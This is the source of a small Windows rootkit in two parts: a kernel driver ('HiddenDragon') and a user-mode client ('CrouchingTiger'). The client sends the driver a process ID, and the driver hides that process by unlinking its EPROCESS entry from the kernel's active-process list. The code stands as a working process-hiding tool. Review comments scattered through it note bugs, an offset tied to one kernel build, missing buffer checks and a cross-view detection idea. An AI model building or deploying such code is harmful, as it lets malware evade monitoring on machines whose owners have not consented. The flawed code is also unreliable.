├── HiddenDragon ├── ntapi.h ├── definitions.h └── Driver.c ├── CrouchingTiger ├── Source.cpp └── tiger.h └── .gitignore
/HiddenDragon/ntapi.h:
--------------------------------------------------------------------------------
#pragma once
#include
#include
/* NOTE(review): the two header names above were stripped by the page
 * rendering (angle-bracket includes) and cannot be recovered from this view. */

/* Prototype for the kernel export HideProcess (Driver.c) uses to resolve a
 * PID to its EPROCESS.  On success the callee hands back a referenced object;
 * nothing in Driver.c releases that reference afterwards. */
NTKERNELAPI
NTSTATUS
PsLookupProcessByProcessId(
    _In_ HANDLE ProcessId,
    _Out_ PEPROCESS* Process
);

--------------------------------------------------------------------------------
/HiddenDragon/definitions.h:
--------------------------------------------------------------------------------
#pragma once

/* Control code shared with the user-mode client; tiger.h repeats this line
 * verbatim instead of including this header, so the two copies must stay
 * identical.  NOTE(review): 0xdeadbeef is far wider than the function field
 * CTL_CODE encodes, so the value actually seen in the IRP is presumably the
 * truncated/shifted result rather than 0xdeadbeef itself — both sides use the
 * same macro, so they still agree. */
#define IOCTL_PROCESS_HIDE CTL_CODE(FILE_DEVICE_UNKNOWN, 0xdeadbeef, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)

/* Status words the driver writes back into the caller's buffer (see
 * DriverDispatch in Driver.c and the constructor in tiger.h). */
#define HIDE_STATUS_SUCCESS 808
#define HIDE_STATUS_FAILURE 404

/* Raw byte offsets into EPROCESS.  They are hard-coded here, not resolved at
 * runtime, so they only match the kernel build they were taken from; on any
 * other build the pointer arithmetic in HideProcess presumably lands on
 * unrelated fields.  IMAGE_FILE_NAME is defined but never referenced in
 * Driver.c. */
#define ACTIVE_PROCESS_LINKS_FLINK 0x2f0
#define IMAGE_FILE_NAME 0x450

--------------------------------------------------------------------------------
/CrouchingTiger/Source.cpp:
--------------------------------------------------------------------------------
#include "tiger.h"

/* Client entry point: expects exactly one argument, the image name of the
 * process to look up, and passes it straight to CrouchingTiger.  The exit
 * code is always 0 on the normal path; all failures inside CrouchingTiger
 * are reported only via printf. */
int main(int argc, char** argv)
{
    if (argc != 2)
    {
        printf("[CTHD]: Invalid arguments\n");
        printf("[CTHD]: Usage \"cthd ProcessToHide.exe\""); // no trailing newline before exit
        exit(EXIT_FAILURE);
    }
    system("cls"); // runs "cls" through the command shell just to clear the console
    CrouchingTiger tiger(argv[1]); // all work happens in the constructor
    return 0;
}

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Prerequisites
*.d

# Compiled Object files
*.slo
*.lo
*.o
*.obj

# Precompiled Headers
*.gch
*.pch

# Compiled Dynamic libraries
*.so
*.dylib
*.dll

# Fortran module files
*.mod
*.smod

# Compiled Static libraries
*.lai
*.la
*.a
*.lib

# Executables
*.exe
*.out
*.app
--------------------------------------------------------------------------------
/CrouchingTiger/tiger.h:
--------------------------------------------------------------------------------
#pragma once
#include
#include
#include
// NOTE(review): the three header names above were lost in the page rendering.

// Duplicated from HiddenDragon/definitions.h rather than shared; the copies
// must stay byte-identical or client and driver disagree on the control code
// and on the status words.
#define IOCTL_PROCESS_HIDE CTL_CODE(FILE_DEVICE_UNKNOWN, 0xdeadbeef, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)

#define HIDE_STATUS_SUCCESS 808
#define HIDE_STATUS_FAILURE 404

// User-mode client.  Resolves a process name to a PID and hands that PID to
// the HiddenDragon device in a single DeviceIoControl call.  Everything runs
// in the constructor; the object keeps no usable state afterwards.
class CrouchingTiger
{
private:
    HANDLE hDriver; // assigned only on the path where a PID was found; otherwise left uninitialized

    // Walks a Toolhelp process snapshot and returns the PID whose image name
    // equals processName (case-sensitive strcmp), or 0 if nothing matched.
    // When several processes share the name the last one enumerated wins,
    // because the loop never breaks on a match.
    DWORD GetProcessIdByProcessName(char* processName)
    {
        DWORD pID = NULL; // NULL used as an integer zero
        HANDLE ss = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
        if (ss != INVALID_HANDLE_VALUE)
        {
            PROCESSENTRY32 pe;
            pe.dwSize = sizeof(PROCESSENTRY32);
            // Process32First is never called: only dwSize is set, so the first
            // strcmp below reads pe.szExeFile before the snapshot has filled it
            // in, and the snapshot's first entry is skipped by Process32Next.
            do
            {
                if (!strcmp(pe.szExeFile, processName))
                {
                    pID = pe.th32ProcessID;
                }
            } while (Process32Next(ss, &pe));
            CloseHandle(ss);
        }
        return pID;
    }

public:
    // processName: image name to look up; argv[1] from Source.cpp, passed
    // through without validation.
    CrouchingTiger(char* processName)
    {
        DWORD pid = GetProcessIdByProcessName(processName);
        if (pid != 0)
        {
            printf("[CTHD]: %s found | Process Id: %d\n", processName, pid); // %d with a DWORD
            // Opens the DOS-name link the driver registers in DriverEntry.  No
            // privilege is requested, so whatever the device's default security
            // grants is what decides whether this succeeds.
            hDriver = CreateFileA("\\\\.\\HiddenDragon", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
            if (hDriver != INVALID_HANDLE_VALUE)
            {
                printf("[CTHD]: HiddenDragon.sys handle opened\n");

                // pid is both the input and the output buffer: the driver
                // overwrites it with HIDE_STATUS_SUCCESS / HIDE_STATUS_FAILURE,
                // so after this call `pid` no longer holds the process id.
                // NOTE(review): lpBytesReturned is passed as 0 with no OVERLAPPED;
                // for a synchronous call the API presumably expects a non-null
                // pointer there — confirm.
                if (DeviceIoControl(hDriver, IOCTL_PROCESS_HIDE, &pid, sizeof(pid), &pid, sizeof(pid), 0, 0))
                {
                    printf("[CTHD]: Hiding %s ...\n", processName);
                    if (pid == HIDE_STATUS_SUCCESS)
                    {
                        printf("[CTHD]: %s successfully hidden\n", processName);
                    }
                    else
                    {
                        printf("[CTHD]: %s was not hidden\n", processName);
                    }
                }
                else
                {
                    printf("[CTHD]: Communication with HiddenDragon.sys failed\n");
                }
                CloseHandle(hDriver);
                printf("[CTHD]: HiddenDragon.sys handle closed\n");
            }
            else
            {
                printf("[CTHD]: HiddenDragon.sys is not loaded\n"); // any CreateFileA failure is reported this way
            }
        }
        else
        {
            printf("[CTHD]: %s is not running\n", processName);
        }
        printf("[CTHD]: Exiting\n");
    }
};

--------------------------------------------------------------------------------
/HiddenDragon/Driver.c:
--------------------------------------------------------------------------------
#include "ntapi.h"
#include "definitions.h"

// File-scope device object and the two names registered in DriverEntry.
// Those names (\Device\HiddenDragon, \DosDevices\HiddenDragon), the DbgPrintEx
// strings below and the IOCTL value are the driver's fixed, observable
// artefacts — the things a detection rule for this sample would key on.
PDEVICE_OBJECT pDeviceObject;
UNICODE_STRING rDevices, rDosDevices;

/*
 * Unlinks the EPROCESS for `pid` from the kernel's active-process list
 * (direct kernel object manipulation).  Returns HIDE_STATUS_SUCCESS when the
 * lookup succeeded, HIDE_STATUS_FAILURE otherwise.
 *
 * pid is a ULONG passed where the prototype in ntapi.h takes a HANDLE, and
 * &eprocess is a BYTE** passed where it takes a PEPROCESS*; both rely on
 * implicit conversions.
 *
 * The reference PsLookupProcessByProcessId hands back on success is never
 * released anywhere in this file (no ObDereferenceObject), so the target
 * EPROCESS is kept alive for the lifetime of the system.
 *
 * Defender note: an entry removed from this list is exactly what cross-view
 * comparison (a walk of this list against an independent enumeration of
 * processes) is designed to surface.
 */
ULONG HideProcess(ULONG pid)
{
    BYTE* eprocess;
    ULONG status = HIDE_STATUS_FAILURE;
    if (NT_SUCCESS(PsLookupProcessByProcessId(pid, &eprocess)))
    {
        // The IRQL raise is the only synchronisation around the list surgery;
        // no lock protecting the list is acquired here.
        KIRQL irql = KeRaiseIrqlToDpcLevel();
        PLIST_ENTRY procEntry, prevEntry, nextEntry;

        // ACTIVE_PROCESS_LINKS_FLINK is a raw byte offset from definitions.h,
        // not resolved at runtime; on a kernel build where the field sits
        // elsewhere this arithmetic presumably points at unrelated memory.
        procEntry = ((LIST_ENTRY*)(eprocess + ACTIVE_PROCESS_LINKS_FLINK));
        prevEntry = procEntry->Blink;
        nextEntry = procEntry->Flink;

        // Splice the neighbours around this entry, then point the entry at
        // itself — presumably so a later unlink of the same entry does not
        // touch the neighbours again.
        nextEntry->Blink = prevEntry;
        prevEntry->Flink = nextEntry;
        procEntry->Flink = procEntry;
        procEntry->Blink = procEntry;

        KeLowerIrql(irql);
        status = HIDE_STATUS_SUCCESS;
    }
    return status;
}

/*
 * Unload routine: removes the symbolic link and the device created in
 * DriverEntry.  Nothing re-links processes hidden earlier.
 * NOTE(review): declared as returning NTSTATUS although it is installed as
 * DriverUnload, which by convention returns VOID — confirm against the WDK
 * prototype.
 */
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DbgPrintEx(0, 0, "HiddenDragon.sys Unloaded\n");
    IoDeleteSymbolicLink(&rDosDevices);
    IoDeleteDevice(pDriverObject->DeviceObject);
    return STATUS_SUCCESS;
}

/*
 * IRP_MJ_DEVICE_CONTROL handler.  The pDeviceObject parameter shadows the
 * file-scope global of the same name.
 *
 * For IOCTL_PROCESS_HIDE the ULONG in SystemBuffer is read as the PID and
 * overwritten with the status from HideProcess (METHOD_BUFFERED, so one
 * buffer serves as both input and output).
 *
 * Neither Parameters.DeviceIoControl.InputBufferLength nor
 * OutputBufferLength is checked before SystemBuffer is dereferenced, and
 * SystemBuffer itself is not checked for NULL: a request carrying no buffer,
 * or one shorter than a ULONG, reaches *output directly.
 */
NTSTATUS DriverDispatch(PDEVICE_OBJECT pDeviceObject, PIRP irp)
{
    NTSTATUS status;
    ULONG bytesio = 0;
    PIO_STACK_LOCATION pio;
    pio = IoGetCurrentIrpStackLocation(irp);

    switch (pio->Parameters.DeviceIoControl.IoControlCode)
    {
    case IOCTL_PROCESS_HIDE:
        // NOTE(review): a declaration directly after a case label is not a
        // statement in C11; whether this builds is presumably compiler-dependent.
        PULONG output = (PULONG)irp->AssociatedIrp.SystemBuffer;
        *output = HideProcess(*output);
        status = STATUS_SUCCESS;
        bytesio = sizeof(output); // size of the pointer, not of the ULONG it points to
        break;

    default:
        status = STATUS_INVALID_PARAMETER;
        bytesio = 0;
        break;
    }
    irp->IoStatus.Status = status;
    irp->IoStatus.Information = bytesio;
    IoCompleteRequest(irp, IO_NO_INCREMENT);
    return status;
}

// IRP_MJ_CREATE: every open of the device is completed with success; no
// per-caller check is made here.  pDeviceObject shadows the global.
NTSTATUS CreateCall(PDEVICE_OBJECT pDeviceObject, PIRP irp)
{
    irp->IoStatus.Status = STATUS_SUCCESS;
    irp->IoStatus.Information = 0;
    IoCompleteRequest(irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

// IRP_MJ_CLOSE: completed unconditionally with success.  pDeviceObject shadows the global.
NTSTATUS CloseCall(PDEVICE_OBJECT pDeviceObject, PIRP irp)
{
    irp->IoStatus.Status = STATUS_SUCCESS;
    irp->IoStatus.Information = 0;
    IoCompleteRequest(irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

/*
 * Entry point: registers the device, its DOS-name link and the dispatch
 * routines.  pRegPath is unused.
 *
 * The return values of IoCreateDevice and IoCreateSymbolicLink are not
 * checked, and pDeviceObject is dereferenced below regardless of whether the
 * create succeeded.  The device is created with plain IoCreateDevice and no
 * explicit security descriptor, so the access a user-mode caller needs to
 * reach DriverDispatch is whatever the default device security grants —
 * presumably any local user; confirm.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
    DbgPrintEx(0, 0, "HiddenDragon.sys Loaded\n");
    RtlInitUnicodeString(&rDevices, L"\\Device\\HiddenDragon");
    RtlInitUnicodeString(&rDosDevices, L"\\DosDevices\\HiddenDragon");

    IoCreateDevice(pDriverObject, 0, &rDevices, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
    IoCreateSymbolicLink(&rDosDevices, &rDevices);

    pDriverObject->MajorFunction[IRP_MJ_CREATE] = CreateCall;
    pDriverObject->MajorFunction[IRP_MJ_CLOSE] = CloseCall;
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
    pDriverObject->DriverUnload = UnloadDriver;

    // DO_DIRECT_IO is set although the only IOCTL uses METHOD_BUFFERED; it
    // presumably has no effect on the dispatch path above — confirm.
    pDeviceObject->Flags |= DO_DIRECT_IO;
    pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;

    return STATUS_SUCCESS;
}
--------------------------------------------------------------------------------